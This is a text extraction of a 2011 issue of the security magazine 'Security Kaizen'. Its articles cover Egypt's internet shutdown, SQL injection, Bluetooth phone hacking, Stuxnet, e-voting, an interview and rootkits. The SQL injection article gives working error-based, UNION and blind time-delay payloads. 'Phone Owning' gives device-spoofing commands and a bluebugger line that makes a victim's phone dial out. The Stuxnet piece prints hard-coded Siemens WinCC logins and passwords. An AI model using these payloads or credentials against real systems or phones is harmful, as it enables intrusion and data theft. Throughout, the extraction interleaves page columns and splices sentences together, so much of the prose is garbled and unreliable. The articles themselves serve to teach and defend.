Security kaizen consumerization


Published on

Published in: Technology, Business
  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Security kaizen consumerization

  1. 1. Editor’s Note April/june 2011 . 2nd Issue After the release of our first issue, we Chairman & Editor-in-Chief received a lot of positive feedbacks, a lot Moataz Salah of improvement ideas and a lot of reviews. Editors people wanted to help making security kaizen magazine a better magazine, wanted it to be Egypt | The First Cyber Revolution 4 Fady Osman Brad Smith one of the top information security magazines Omar Sherin in the world. Osama Kamal To be honest, I didn’t expect that we will have Grey Hat Amr Thabet that success in such short period, nor did I Types of SQL Injection 10 Ahmed Saafan Vinoth Sivasubramanian expect that one day I’ll appear on the Egyptian Phone Owning 12 Paul de Souza TV to talk about our initiate and our Magazine. Mohamed Enab So I wanna attribute our success to all my Language editors readers, anyone contributed with an article or Stuxnet: and the truth shall set you free 16 Salma Hisham even a small comment, everyone criticized our 18 Salma Bakr A visit to RSA Conference work, all of you guys were a huge help to us Lobna Khaled Electronic Voting | Security Challenges 20 I still have a lot of people to thank for their Graphic Design help in the last couple of months but the An Interview with Clement Dupuis 22 Mohamed Fadly space won’t allow me to do that. so Thanks everyone, we wouldn’t have made it this far Web Site Design without you. Mariam Samy Rootkits: A Deeper Look 26 Security kaizen is issued As I said we are always kaizenning our Password Crack 30 every 3 months magazine and due to the tons of requests we received, a new version of the magazine willReproduction in whole or part without be released in Arabic to cover more readers Best Practicewritten permission is strictly prohibited on the Arabic countries. Also Security kaizen All copyrights are preserved to magazine was able to get special offers for our A Simplified Approach to Achieve Security in a 34 readers in various worldwide conferences; you Consumerized Environment can check more details about that through the Cyberspace as a War Fighting Domain 38 magazine or on our website. Finally, this was just a start and we are always eager to kaizen, improve and reach new horizons. We still need more volunteers from all countries. so Join us and be part of our For Advertisement in security kaizen. Security Kaizen magazine and website: Mail: Phone: 010 267 5570 2 3
  2. 2. No one, not even Mark Zuckerberg the founder of Facebook, nor Jack Dorsey the founder of Twitter had imagined that one day their websites will help in a countrys revolution, take down a president or change a regime. Egypt’s well educated youth, whose through the streets, to regroup themselves sole dream is to see Egypt a better after being distracted by security agents country, lead peaceful demonstrations either by water, tear gas or real bullets. on the 25th of January 2011, which is the National Police Day, against injustice and freedom suppression. On the 11th of February 2011, Hosny Mubarak finally declared his resignation as the President of the Arab Republic of Egypt. Just to give you a few examples of people who joined the revolution: Wael Ghoneim (EMEA Marketing Manager of Google) who was arrested by the police on the third day of demonstrations; Dr. Ahmed Zewail (Egyptian Nobel Prize Winner in Chemistry), Dr. Mohamed By the end of the first day of the revolution, ElBaradei (former Director General of Tuesday 25th of January, Egyptian the International Atomic Energy Agency), Intelligence banned the access of Twitter and many Egyptian celebrities. from inside Egypt. They also banned some online opposition newspapers like What is unique about this El-Dostor. But that didn’t stop Egyptians revolution? from accessing Twitter and those websites using different proxies and in few minutesEGYPT It will be recorded in history that Egypt’s a series of proxies and ways to get around revolution was the first Cyber revolution the ban were shared among Egyptians. in the World. On the first three days, The Egyptian hackers quickly reacted to protesters used their smart phones, those actions by attacking the website Blackberries or iPhones to guide the of El-Ahram (one of the main Egyptian demonstrations. It all started with Government newspapers) and that of the Facebook. Then Twitter played a very Ministry of Interior Affairs using DDOS crucial role in guiding demonstrators (Distributed Denial of Service Attacks).The First Cyber Revolution We won’t continue talking about the revolution and its political development, you can get back to the news for more information. We will now concentrate about the technical part and our view regarding what happened later, withThe Full True Story on How Egypt respect to cutting all means of communications across Egypt.Shutdown the Internet for 5 whole days 6 5 April/june 2011
  3. 3. By the second day, Wednesday 26th of (ADSL, dial-up, etc) The bandwidth of international lines is what is known as POP. The bandwidth isJanuary, Facebook usage was blocked To summarize the situation, all means of sold to ISPs and companies as requested, then distributed to the home end-usersin some areas, especially in El-Tahrir communication were down, except land and then distributed across Egypt using or companies. Check figure 2 for the line phones. Telecom Egypt cables, which are the only Internet hierarchy in Egypt.Square (Liberty Square) where most cables available! This is done throughprotesters gathered. Facebook wastotally banned on the third day (Thursday How was the Internet cut? International27th of January) of the protests. During ISP1 room ISP2 room Companiesthose three days, the situation was a real In order To know how the Internet waswar between the Government and the cut in Egypt, we first need to know theprotesters; on the streets and on the web. Telecom Egypt physical hierarchy of Internet in Egypt.On Friday 28th of January, in the early (switching & testing rooms) We will try to simplify the details as Telecom Egyptmorning - Friday is the weekend in much as possible so that readers with linesmost Islamic countries - the following no telecommunication background grasp International Cablescommunication services were down: how it works easily. In AlexandriaAll mobile phone communications SEA-ME-WEA4/Flag(voice calls, mobile internet, SMS, etc.) Different countries are connectedi.e. Egypt’s three operators were down together using a network of optical fibers, Core POP1 Core POP2 Core POP3completely with all their services with very high bandwidth, in seas andAll internet connections by all providers oceans. Check figure 1. Edge PoP1 Services to users in PoP1 Services to users in PoP1 Figure 2: Internet hierarchy in Egypt Therefore, in order to cut the Internet according to every ISP’s Network Design, across Egypt you have more than one but the easiest  way is to withdraw their option: Border Gateway Protocol routes (BGP ● Egyptian Government can disconnect protocol is a protocol used by border all the lines from the source (here the routers to transfer information between landing point of international cables is different autonomous systems), and most Alexandria). But this will disconnect all probably this is what happened with most the lines connecting Egypt to the outside ISPs world and that was not the case; only ● If the ISP refused to cut the service (like 88% of the Internet usage in Egypt was in NOUR CASE), the Government can down and nearly12 % was still working. cut the service by itself through Telecom So this option was not likely to have been Egypt POPs but in Nour Case which is used not a residential Provider and most of Figure 1: Submarine cable disruption map ● Authorities can intimidate the ISPs to its customers are big companies, Egypt For Egypt, all international lines have two landing points (Alexandria shut down the services to users. This was security agencies accepted or agreed not and Suez), for example the SEA-ME-WEA4 line is the line which clearly published by Vodafone, that some to cut the internet on Nour Customers, connects South East Asia-Middle East-Western Europe, and it Egyptian security agencies ordered them but that made TEdata and Linkdot net, carries telecommunications between Singapore, Malaysia, Thailand, to shutdown all mobile services. Shutting the biggest service providers in Egypt, Bangladesh, India, Sri Lanka, Pakistan, United Arab Emirates, Saudi- down the Internet from the ISP’s side complained that Nour is still working and Arabia, Sudan, Egypt, Italy, Algeria and France. can be made by many different ways that may affect their business , that’s 6 7 April/june 2011
  4. 4. why Nour was also down on Monday by Twitter, Facebook and SMS services. AndTelecom Egypt not by Nour Engineers.So maybe they also knew more than that!Nour was down for a business reason not Whatever they knew, the decision was Conclusionfor a security reason. taken to cut all communications including all the Internet and mobile facilities. This story gave us some facts that don’t exist only in Egypt but in mostWhy were the Internet and countries that use the Internet: But unfortunately this was the most stupid Internet traffic is monitored, especially social media networks and thismobile communication cut? decision, because people who were can be checked in the customers part of where you will at home, waiting for brothers, sisters, find nearly 1/3 of their customers are countries governmentsWhat happened by the end of Friday relatives and friends to come back, Today, social media networks are not used only for connecting withexplains why Egyptian Intelligence cut couldn’t communicate with them. They friends or making business marketing, but they can be used in issues affectingall communications in the country. This couldn’t call their friends, couldn’t connect whole countries; revolutions, wars, was named: Friday of anger, where to the Internet to know their latest activities This story also gave us some questions, for which we hope to find answers:millions of people went out in the streets on social media, and couldn’t even send On which level do governments have the right to control essential life facilities,and the highest number of dead people a single SMS! So, more people went out like communications, electricity and others, to civilians even in cases ofwas reported on this day as well. in the streets, maybe not to protest but to emergency? merely show their anger at this decision. Will you support a law, if it doesn’t exist in your country, that considers theEgyptian Intelligence uses a solutioncalled NarusInsight. The NarusInsight Internet and telecommunication systems as main human needs like electricitySolution for Intercept, as says, Was the Internet 100% cut supply, water supply and others, which can’t be cut with such a way?!delivers unmatched flexibility to intercept across Egypt? Finally Egypt’s story was a real proof that Internet in general and socialIP communications content and identifying media networks in specific can really change the world. Virtual life can causeinformation, enabling law enforcement The answer is NO, according to most revolutions, wars, crimes and more. Egypt started the revolution on the virtualand government organizations around statistics nearly 88% of the Internet network and transferred it to a real story, a real TRUE STORY.the world to effectively gather evidence connection was down. What about theof illegal activity in the multifaceted world rest 12%. Well, we have different cases,of IP communications. for example: NOUR was the only service providerNarusinsight can monitor users’ traffic, that kept working for 3 days out of the 5including recollecting their mails, days (they were down only for 2 days –chats and other data. Built on the Monday and Tuesday – while the InternetNarusInsight Traffic Intelligence System, was back across Egypt on Wednesday)the NarusInsight Solution for Intercept All international MPLS Lines were workingpassively monitors multiple links on the fine, so companies who had MPLS Linesnetwork. It monitors each packet on the through any provider were working in thenetwork link and analyzes it against a whole 5 daystarget list input by the providers or directly One of the solutions was to use theby a law enforcement agent. If the packet international land line to dial up anmatches the target criteria, it is captured external service provider in France or anyfor formatting and delivery to storage, country using a dial up modem, but thislaw enforcement or directly to optional costs a lot of much of coursecontent rendering and analysis tools. Another solution was to have a satellite connection, this way you won’t passEgyptian Intelligence or National Security by Telecom Egypt lines but again this Referencesknew that a lot of people will gather on solution is so expensive and still not http://www.narus.comthis Friday, and they knew in the last 3 reliable for huge companies but it is better how they collect themselves using than nothing 8 9 April/june 2011All images included in this article are copyrighted to their respected owners.
  5. 5. GREY HAT The database will simply display the results in the search query as you can see in the following image.Types of By Fady Osman SQL injection SQL injection is probably the most dangerous known web attack. Sometimes it could lead to remote code execution that gives the hacker a full control of the system. In this article we will talk about SQL injection types.1- Error based SQL injection : The exploitation of the errorIn this case the database simply the based SQL injection is fairly straight. For Another thing to notice here is that the database language can be this query:application sends back the database example the attacker can make an invalid the database version reveals also theerrors directly to the user. Sometimes comparison between an integer and the operating system information which is http://[site]/page.asp?id=1; IF (ASCIthis happens because the developer of data he needs to extract. To make things something that should be disabled by the I(lower(substring((USER),1,1)))>97)the website didn’t turn off debugging on clear lets see an example (Assuming MS database administrator. WAITFOR DELAY ‘00:00:10’the server. SQL database). 3- Blind SQL injection : the above query will wait for ten seconds Injection : or 1=user()-- This is the hacker’s last choice since it only if the first letter of the user name take a fairly long time. I worked once is not “a” then you have to do this with Response : Syntax error converting the nvarchar value ‘ahmed’ to a column of with blind SQL injection and to be all other letters of the user name. Then data type int. honest it wasn’t a pleasant experience you move to the password hashes and it took me all the night to successfully so on. This makes it obvious that using exploit this vulnerability. Even with some automated tools or scripts is fundamentalFrom this example you can see that the 2- Union based SQL injection : tools available like sqlmap, sometimes otherwise it will take you days to retrieveuser name ‘Ahmed’ which is the output of Union based SQL injection as the name you need to write your own scripts to only the basic information.the user function is sent back in the error suggests abuses the union operator. successfully exploit blind sql injection.message. The attacker can also retrieve The basic idea is to append the data Now let’s talk about how blind sql About the author: Fady Osman isother information from the database. that the attacker wants to a table that is injection works. In this case the database an information security professional, already displayed in the page. See this will not give you any output not even researcher, and author. He focusesTip : If you don’t have a good experience example from DVWA (A vulnerable web an error message so you need to find mainly in the areas of exploitationwith databases and what useful functions application created for training hackers another way to retrieve data. This can be ,reverse engineering ,web securityyou can go to this website which will give and to be used in educational classes). done by asking database questions like and c programming. His team wonyou a cheat-sheet for SQL injection : Inject this code inside the id parameter : “if the first letter of the user name is not the second place in the MIE 2010 null’ union select @@version,2# an a then wait for 10 seconds” which in competition organized by IEEE Egypt. GREY HAT 10 11 April/june 2011
  6. 6. Let’s pretend we’re a phone Phone owning Notice in the above example that our Service / Device Class shows we’re a computer. Notice the Link mode is SLAVE ACCEPT. We want to change all of By Brad Smith this so we look like another cell phone. This article will show you how to get started in performing Type this at the command prompt: penetration testing on cell phones to see if it can be hciconfig -a hci0 class 0x500204 compromised by accessing their data via Bluetooth (BT). hciconfig -a hci0 lm accept, master; This is an important part of penetration testing as many hciconfig -a hci0 lp rswitch,hold,sniff,park; bad things can be done to someone’s phone without their hciconfig -a hci0 auth enable knowledge. If they own your Phone, they own your life. hciconfig -a hci0 encrypt enable hciconfig -a hci0 name Resume Now run hciconfig –a again and notice the differences. The last command to change the nameThis is an advanced article so you need Bluetooth was designed as a serial port is important because that’s what appearsthe following base knowledge: replacement. Just like serial ports of old, on the screen. Would you take a callYou need to be able to boot a Backtrack you need to set an IRQ and a Memory from “bt-0” or “Resume” or “ “?4r2 disk on a compute that has Bluetooth address to interact with other devices.device installed. You can use other Bluetooth needs a Channel and Memory Notice what the Service / Device Class is now. You’re a Phone!distros if you like but BackTrack has 32 addresses set to interact with othertools just for Bluetooth. phones. Let’s Start Who else is out there? With Backtrack booted up to the command line and the Bluetooth adapter There are several good tools for scanning on Backtrack, l2ping (that’s an installed type: hciconfig you should see all the “acceptable” devices. If no L not the number 1), hcitool device appears on the list and you have scan, sdptools browse and the device plugged in, well, your device this one BTscanner. won’t work. Sorry, you need to try a What we’re after is the Address different device. Not all BT adapters of the device, think MAC are created equal. address of a network card and the cannel each service is If a device appears (hci0) then bring it offered on. When you click on a up: hciconfig hci0 up, just like it was a device it gives you more information, specifically the cannel of each service wireless card. offered and memory addresses of the device. The hciconfig –a command should return a list of features for all the Bluetooth adapters on the computer. It should look like this: GREY HAT 12 13 April/june 2011
  7. 7. What Now?Let’s start with a simple program that does lots. My favorite is bluebuggerbecause you can change Option parameters quickly till it works properly.Notice the different modes that bluebugger offers.You can do it all from the command line:~#./bluebugger –m Ron –c 7 –a xx:xx:xx:xx:xx:xx dial 1900badpeopleLets look at this command, simply add the channel andconnection name (here it’s a blank, I use Resume).Seems to simple yes? Very true, it doesn’t work onevery phone that has the Bluetooth on so you needto try lots of different.I look at a lot of Phones and some brands are easierto penetrate than others. Which ones? Depends onmodel, make and how it’s setup.With so many Bluetooth tools here are a few allpurpose basic tools to learn: Hciconfig, Bluescan,l2Ping, SDPTool, hcitool, BTScanner, Bluesnarfer,Bluebugger, Carwhisper.Bluetooth devices are growing number daily. Security is poor at best,coupled with the predicted increase in mobile threats, and NOW is the timeto secure yours and your businesses Bluetooth devices. Here’s help! NIST “Guide to Bluetooth Security” 800-121 About the author: Brad started breaking his toys at a very early age. When he wrote his first computer buffer overload in 1972 which totally wrecked the University computer system, he realized the potential to break much larger things. Now he spends his time teaching other to break small things that have large importance, like cell phones. GREY HAT 14 17 jan/march 2011
  8. 8. new & NEWSnew & NEWS “white papers, cleaning tools, contacting customers, working with top AV vendors, even magazine interviews”. Isn’t this what Another statement that also reflects severe undermining of the terms “due diligence, and responsibility” is a they are paid to do? question they highlighted in yellow: “Has the customer done all he can?“.Stuxnet: What is really strange is their genius Imagine a car manufacturing company conclusion that future infections are that sold you a very expensive car “unlikely”, and this is due to the fact that equipped with an advanced airbag the malware pattern is now detected by up system, then someone smashes into to date anti-virus programs. Eureka !! your car and the airbag doesn’t work,and the truth shall set you free Yes, future “Stuxnet” infections might while in hospital the car company lawyer By Omar Sherin be unlikely, but this is certainly not the asks you why didn’t you bring an airbag end of this type of attacks as long as top from home just in case! vendors like Siemens still use “hard coded & publicly available” passwords on critical What is Stuxnet: it’s the most complicated piece of malware ever systems in the year 2010 and don’t even written. Up till now there has been wide speculations that it was admit that this is the REAL problem. written by a specific country to attack the Siemens computer control systems used in the nuclear program of Iran. Security experts I was able to locate the hard coded (built- heavily criticized Siemens because the worm exploited, among in) user names and passwords in Siemens many things, a “hard coded password” in the Siemens system. The technical online forums: Stuxnet worm infected critical energy companies in 125 countries. login=’WinCCConnect’ password=’2WSXcder’ login=’WinCCAdmin’ password=’2WSXcdeLast month Siemens Internal CERT The slides confirmed that the malware(Computer Emergency Response Team) is capable of transferring data outside ofreleased some slides about Stuxnet as a the infected system back to the commandform of “Official Communication” within and control servers, yet nothing has beentheir constituents. The slides were taken proven specially that the two C&C serversoffline few hours later. ( • www[.]mypremierfutbol[.]com • www[.] About the author: My name is Omar Sherin and I am the OWASP Egypt chapter chair todaysfutbol[.]com ) and a member of the OWASP Leaders Board.I have more than 8 years of professionalBut as I was reading through the slides I were brought down by Symantec. “I corporate and national level Information security experience plus more years as a securitydecided to take a copy just in case they would like to add that both servers where and online privacy advocate. I also hold a diploma from Carnegie Mellon’s Tepperdo just that. In the official slides (Here), located in Germany”. School of Business in entrepreneurship and corporate innovation.I’ve worked for severalSiemens confirmed that Stuxnet was multinational firms in the oil and gas sector, communication, government and professional services sector, in my spare time I’m an active Information Security blogger and Speaker.a “targeted” attack by using terms like Then the Siemens slides claim that all Specialties“targeting a very specific configuration, known infections are now clean and zero • SCADA Securitycertain PLC blocks and specific processes enterprise damages reported. Yet they • Critical Infrastructure Information Protection (CIIP)or (project)“. These bold statements didn’t specify their definition of “damage”, • Business Continuity and Disaster Recoverysimply means that Stuxnet makers had is it seeing the enterprise up in flames or • Information Security and IT Audit(one target) in mind, and this should few bytes of data going out? The slides • Risk Assessment , GAP Analysis, Security policieseliminate any theory out there denying go on listing the great deeds of Siemens • Digital Forensics and web application pen testingthat its a state sponsored malware. since the discovery of the malware: new & NEWS 16 17 April/june 2011
  9. 9. A visit to By Osama Kamal He showed some videos of the show, with 800 nodes. They have 46K records scamming people in cafe shops or even daily handled by 5 information security in casinos that have very tight security analysts. In 2007, they had 4000 nodes, mechanisms to prevent fraud, and the message was to highlight the importance and danger of social engineering attacks. The video is available on RSA Conference website; a highly recommended one. One of the interesting presentations was about Mature SIEM implementation, by Bradford Nelson and Ben. It discussed a real implementation in one of the US Government entities, where they divided the SIEM evolution into 3 phases: Infancy, Growth, and Maturity. In Infancy 2M records/day, and 14 analysts. In 2010, mode, you need to focus on collection they had 30K nodes, 326M records and and aggregation. In Growth mode, you 32 analysts. These are pretty insightful need to focus on real-time monitoring, numbers if you are planning for a SOC. unsupported sources, and environmental They started with logs like failed logins, modeling. In mature phase, you start port scans, and AD changes. Later developing processes, adding external they added IPS, packet capture, and threat feeds, putting alerts into business packet drops, then apps, users, social context, aggressive normalization and media, auto ticketing handlers, honeynet correlation, and adding application/user sensors, and all connections. That is a lot behaviour analysis. to handle!RSA conference is by far the biggest by giving an example of an unusual According to the presenters, you shouldcommercial event I have attended. It definition. He then asked people to use start defining your requirements first, then The conference is an excellent chance tois not just an expo with more than 400 their mobile phones and computers to do procurement, design, deployment, and get updated with new technologies frominformation security companies, but it search for that term on the Internet and then content delivery. The requirements vendors. It is all about the defence side,is also a place where you get to meet showed that google search revealed a definition is very important and should not the offence side such as Blackhat.information security rock-stars and the top totally wrong definition as he was able use vendors literature combined with If you in are in security business, thismanagement officials of big companies. to poison the search results by creating your own technical and business needs. conference should be your target.In addition, the event also has a lot of a Wikipedia page and a YouTube video, You can simply look for use cases tosessions, mostly panel discussions, with some link building techniques to give understand more. Things to consider About the author:where you listen to the people who the wrong definition on top of the search are: start slowly, you can use NIST 800- An independent security analystare shaping the security industry or results. 53, and 800-92 as a start; go for quick with over 13 years of experienceare heavily involved in it in one way or wins; and do not try to spend lots of time in security operation, design,another. Hugh Thompson also hosted Alexix in unsupported logs. Also check your architecture, and incident Cornan, who runs a show in BBC; the data collection rates, and build your key handling. Running his own blogMy favourite keynote was the one of Real Hustle. He showed how easy it is to performance indicators and metrics. for almost 2Hugh Thompson gave about social scam people using “misdirection”, which years, currently focusing on openengineering, entitled “People Security”. is one part of a good scam. It does not They gave some numbers from their source information gathering,He showed how easy you can mislead matter how smart you are, even security environment, when they started in 2004 and threat intelligence”.people through search engine poisoning conscious people can be scammed. new & NEWS 18 19 April/june 2011
  10. 10. Electronic Voting votes. Electronic Voting can be used in presidential elections, parliament members’ elections and also inside the backup so as to maintain confidentiality and integrity of data. And by having the backup, availability is guaranteed. Security Challenges parliament while voting for legislations and policies. We need to forget about the previous “funny” way by which votes These DRE machines should be hardened and certified through audits, so as to ensure security. For sure machines By Mohamed Enab inside the parliament were handled and“Cyber Revolution”… a catchy expression lot of factors. If you simply play in the move to E-Voting; the Speaker of thewe use these days! This type of “revolution” voting software by a virus or a bug then People’s Assembly of Egypt used tois conducted over the Internet using social you might have an undesirable president just check the votes for legislations andnetworks, such as Facebook and Twitter, or parliament member for example. policies only by the eye!and this is the first time in history that Therefore, due to its critical risks and that Let us see how we can implement thepeople start a revolution against unfair some countries already had voting fraud Electronic Voting system; usually theand oppressive government systems by incidents, Electronic Voting needs to be system will machines all over the countrya Cyber Revolution. assessed and analyzed well to check to collect the votes. These machines areTo help maintain the principles of this whether it is can be applied safely in our connected in a secure way to a centralrevolution and sustain it to use it anytime country. Basically a voting system has point for analysis and monitoring. So ifwe are again confronted by governments four main characteristics;1 we spread our devices over 700 sitesthat lack freedom of speech, we should 1. Accuracy: The goal of any voting for example, and then the central point Figure 1 DRE Machine used in Brazilput some “controls” into our lives to system is to establish the intent of each notices that some suspicious activitiesguarantee as much as we do not reinvent individual voter, and translate those then investigations may start and track may differ from one type of election tothe wheel, especially while no political intents into a final tally. To the extent any distrustful activity. But what kind of another, but the concept is the is in control and there is some sort that a voting system fails to do this, it machines should be used?! Maybe a I believe that in order to have “Cyberof chaos around a certain country. That is undesirable. This characteristic also PC, but it can be infected by a virus or a Revolution”, we need to implementis the time to put neutral controls over includes security: it should be impossible worm. Maybe a hardened machine! How systems in our countries which bringCyber Revolution. to change someone else’s vote, ballot can these machines be connected to the technology into our daily lives. And sinceI said “controls”, right?! Yes, I did. Does stuff, destroy votes, or otherwise affect sites. secure voting is a crucial step in bringingnot this remind us, Security Professionals, the accuracy of the final tally. Usually machines used in E-Voting, in trustworthy entities for the sake of servingof something we used to use in our daily 2. Anonymity: Secret ballots are countries like Brazil, India, USA, are our people, then special attention shouldlife when referring to Firewalls, IPS, IDS, fundamental to democracy, and voting Direct-Recording Electronic (DRE)2 voting be paid to deploying “Electronic Voting” inetc. But what type of controls am I talking systems must be designed to facilitate machines. A DRE machine records votes our countries.about?! voter anonymity. This also means by means of a ballot display providedAs we all know, the main objectives of confidentiality, in one way or another. with mechanical or electro-optical About the author:Information Security is to protect the 3. Scalability: Voting systems need to components which can be activated by Five Years of Experience inconfidentiality, integrity and availability be able to handle very large elections. the voter (typically through buttons or a Information Security Consultation touchscreen). Then data is processed Field & possess deep knowledge andof our company, our organization and With the increase of population, we need understanding for security threats &our country. What I see right now is that to invest on something that could sustain by means of a computer program. Then voting data and ballot images countermeasure, security productspeople believe in this revolution and along enough. & technologies, Information securityto help them trust it more and more is 4. Speed: Voting systems should produce are recorded in memory components. management systems, networksto have a system that makes them feel results quickly. This is particularly After the elections, the DRE machine & operating systems. Having beensecure and safe when they give their important where people expect to learn produces a tabulation of the voting data in Banking Field for 2 years wherevotes during elections or referendums. the results of their voting on the same day as a soft copy stored on a removable Money talks and Security is a greatWe are talking here about “Electronic it took place, before bedtime or early the memory component and as a hard copy concern there and also in InformationVoting”. day after, and monitor the progress of the as well. The system may also provide a Security Consultation Field givingI know that the idea is not new, and that it voting process. means for transmitting individual ballots consultation and advisory actions tohas been implemented in lots of countries So, these are the four main features or vote totals to a central location for customers to get the best of the breedsuch as the USA, Spain, Australia, and that should characterize Electronic consolidating and reporting the results from security solutions and secure by precincts at the central point. So data the organizations which have differentthe Netherlands - just to name a few - Voting, and if we have a system that concerns & Business Objectives. Ieither by Remote E-Voting or Polling can do that electronically then this will can be transferred securely through encrypted links or flash memories with have right now Security CertificationsPlace E-Voting. However, these systems guarantee neutral and falsification free like CISSP, CCSP, SSCP and have aare not easy as you might think; they good networking/Telecommunication 2 Definition as per Wikipediaare complex systems that depend on a 1 Adopted from Bruce Scheier Blog - Schneier on Security background. new & NEWS 20 21 April/june 2011
  11. 11. An Interview with • What made you take the Free Information Sharing Route instead Clement Dupuis of selling your knowledge? As you get past 50 years of age you realize that you do have quite of bit of wisdom and knowledge that you have acquired over the years. At one point you need to get someone ready to take over from you and finally retired. By Moataz Salah I am from a small lumberjack village in the deep woods of Quebec, Canada. In my Clement Dupuis is a man that you village people always help each others, skills and knowledge are passed from father can’t prevent yourself from respecting to son for generations, I taught doing the same on the Information Security side his thoughts and his principles. could be a very interesting project. His principles and beliefs were one It started as a hobby and today the Family of Portals reaches over 150,000 security of the main reasons to launch our professionals in more than 120 countries around the world. It does make me feel magazine, Security Kaizen Magazine. proud when someone sends me a message to thank me and my team for the work Two years ago, I started quoting we are doing in helping the community. one of his famous sayings in my lectures ”Don’t be a leacher, Don’t I was asked many times WHY I do not charge a fee on some of my portals. With the suck people blood till you get all the number of members we have we could be millionaire if I would have charged $10 per information you need , share your person. We all need money, however we never have enough, it is a never ending knowledge even with just a comment“ story. Above money there are people, when I am able to contribute to someone career and help them progress and reach higher, I feel a lot better than getting $10 Clement Dupuis as a fee. People should always be priority number one. Founder and Maintainer of the CCCure Family of Portals • Can you give us more ideas about your free information sharing web sites and the free Services you deliver?• Can you introduce yourself to Security Kaizen Readers? Our portals contains large collection of Documents, links, forums, mailing lists, cramGood day to all, study guides, quizzes, and a whole lot more.My name is Clement Dupuis, I am the founder and maintainer of the CCCure Family The portals are large containers of knowledge that constantly get updated and betterof Portals. Twelve years ago I started to dedicate all of my free time to “Giving Back as more and more people are the community” which has been a way of life since then.I had the privilege to work for 20 years for the Canadian Department of Defense and • What problems did you face when you started your freewas exposed to radio communication, satellite communication, and finally I got into information sharing web sites?the computer world. The first 4 years were very lonely, you spend all of your free time building content,I was one of the very early pioneer who was attempting to use the Personal Computer answering queries, and you do not see anything being returned to you. Then all of(PC) in places and in ways it was never, ever attempted before. I had to combine a sudden my site was listed in books and magazines which drove a lot of traffic to it.modern equipment with outdated radio communication. Often time we had to talkwith the engineer that wrote the software to make things work. There was no better I felt like quitting the whole project many times. There were days when I would getway to learn the details behind the interfaces that we were using. negative feedback that made me feel like pulling the plug. However, my wife who is the calm and moderate person behind me would always remind me that for everyNetworking, Personal Computers, Server, and making them work together has been negative message I have most likely received 100 positive message. After a whilea hobby of mine for more than 20 years. It is always a privilege to have your hobby you learn to concentrate on the positive and accept that you cannot please 100% ofas your full time job. your visitors. new & NEWS 22 23 April/june 2011
  12. 12. - HITB MagazineTime has always been my biggest challenge over the past 10 years. Maintaining - (IN)SECUREportals is VERY time consuming. - MISC Magazine - Professional Tester• Which Security Conferences Clement Dupuis must attend every - SecurityActsyear? - Security Kaizen - The Hackademy JournalThere are a few that I always attempt to attend such as BlackHat, Defcon, - UninformedCanSecWest, and Hacker Halted. They are some of the largest and also some ofthe best conference that exists out there. • What is your Comment about Security Kaizen Magazine ? and what is needed to rank it as one of the best magazines in• You are a big fan of CISSP, why is that ? Information Security field in the world?There are a lot of misconceptions related to the CISSP certification. It is NOT a Security Kaizen is a very interesting magazine and once I read through the firsttechnical certification, however it forces a Security Professionals to learn more about edition I know that it is a magazine that will only get better with time. The magazinedomains that he would not get exposed to in his daily tasks. is very young compare to other magazine that exists out there.The CISSP shows that a Black Box approach to security will not work. You can The success will depend on a few things: Content, Content, and Contentstack 10 security appliances and they will still be ineffective is there is no policies,procedures, or processes in place. If your provide great content the readers will come to read it. From what I have seen so far you are on the right path to do so.People have to realize that only hardware or software is not the answer to security.You have to have a good mix of policies, people, and process, the 3 P’s. Last but not least, ask for feedback and listen to your readers. Ask them what they wish to get and provide it to them. All of this will make it a great success.I was one of the first person to become a CISSP in Canada. I saw that it was a greatpackage but there was no resource to prepare for it. This is when I decided to createthe CCCure.Org web site. I wanted to help other in becoming certified and by the • From your experience, What is mostly needed in the Middlesome token better understand what security is all about. east and arab countries to help them be an added value in the information security field instead of just importing technology• What is your Plan for the next coming years ? There is already an amazing number of software and hardware company comingI am now at the point where my portals needs to move to a better platform that will from the Middle east and Arab countries. Unfortunately some are nice players or areintegrate with the viral world of Social Media. This is one of the major project to come. not recognized in their own country.I also need to categorize content by geographical location. People loves to know Information Security and it’s associated technologies are still something that is upwhat is in their backyard and what resources they have locally. and coming in those regions. Leadership must start at the top at the government level. Cyber Security should no longer be seen as a luxury but as a necessity toAdding a few more certifications is also on the menu. Cloud Security and Risk security conduct business in a connected world.Management comes to mind. For the first time in history companies have suffered more losses and fraud online• Can you rate the top 5 magazines in the Security World? than the physical world in 2010. Where there is financial transaction and money involved there is also crime. The online world is no different than the physical world,This is a tough one. Some magazines cater to management, some others cater to in fact it is a lot easier to commit crime online than risking being caught in the actSecurity Testing, some will be for programmers, as you might have guessed I read a doing a physical crime.lot of security oriented magazines. On my short list I do have:- 2600 Quarterly Sharing information, Educating more people about these issues, and create a climate- Club Hack Magazine favorable to endless learning is one of the most effective tool one can use against- Hakin9 criminal activities over our networks and systems. new & NEWS 24 25 April/june 2011
  13. 13. Step By Step 4. Types of Rootkits: 1. User-mode Rootkits: modify the system functions or hook I/O request packets (IRPs), which are sent Rootkits: This type of rootkits is simply working in the to the device drivers for the purpose of user mode and it hooks some functions in modifying the inputs and outputs to this a specific process, sometimes it loops on device driver. all processes except the system process- Kernel-mode rootkits can hook all es. It is done by injecting a code inside processes, including system processes A Deeper Look the virtual memory of this process, and then it patches the first instructions of at once; however, they are harder to detect and remove. By Amr Thabet the hooked function to force it to call the The problems of kernel-mode are mainly injected code. due to it being hard to program and very1. What is rootkit? of security called rings. Rings are simply Hence, the injected code modifies the sensitive to the changes of the operatingThe rootkit is simply a programme that a set of privileges or restrictions, whichgives you a permanent access to the enable hackers to work on them. input of this function, and then resumes system, and sometimes sensitive to the“root”, which is the highest privileged user There are four rings and they begin with the hooked function to modify the output changes of devices UNIX system. ring-0, which is the highest privilege and of the very same function, and at lastThe rootkit can easily control the system it is called kernel-mode. Ring-3, that is, returns again to the process. 5. How Rootkits Work?or modify it on the fly to force it to hide the the lowest privilege and is called user- 2. Kernel-mode Rootkits: First of all, how Windows works shouldpresence of a specific virus or spyware. mode. All applications run in user-mode On the other hand, kernel-mode, the be understood. Windows is an operating and have specific privileges which they, second type of rootkits, works inside the system created to become a layer2. Why rootkits? by all means, cannot exceed. When system. These rootkits are installed as between the hardware devices and theIt gives you a permanent access to the operating system runs in the kernel- device drivers and they have the ability to software applications and users.the infected machine. For as much as mode, which has the highest privilege, ithackers’ belief, it is not only enough to can do everything ranging from modifyingpenetrate a system or compromise its the memory of the system, modifying thesecurity defenses, but also the ability to setting of the processor, to sending and Users And Applicationsstay hidden in the system to spy or control receiving signals from computer for your desired needs is a must. There is a single way to jump from ring-3Therefore, rootkits are mainly created to to ring-0, which is done by a processorhide the 